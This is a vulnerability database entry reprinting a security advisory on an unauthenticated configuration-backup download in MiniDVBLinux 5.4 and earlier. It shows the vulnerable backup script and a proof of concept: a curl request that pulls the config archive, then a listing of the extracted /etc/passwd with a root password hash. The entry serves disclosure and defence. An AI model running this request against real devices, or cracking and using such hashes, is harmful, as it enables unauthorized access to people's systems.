Vulners
Lucene search
MiniDVBLinux <=5.4 - Config Download Exploit
# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
# Exploit Author: LiquidWorm
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application is vulnerable to unauthenticated configuration
download when direct object reference is made to the backup function
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.
====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
01: <?
02: if [ "$GET_action" = "getconfig" ]; then
03: . /etc/rc.config
04: header "Content-Type: application/x-compressed-tar"
05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
07: cat /tmp/backup_config_$$.tgz
08: rm -rf /tmp/backup_config*
09: exit
10: fi
11: ?>
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>
====================================================================
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php
24.09.2022
--
> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2023 00:00Current
7.4High risk
Vulners AI Score7.4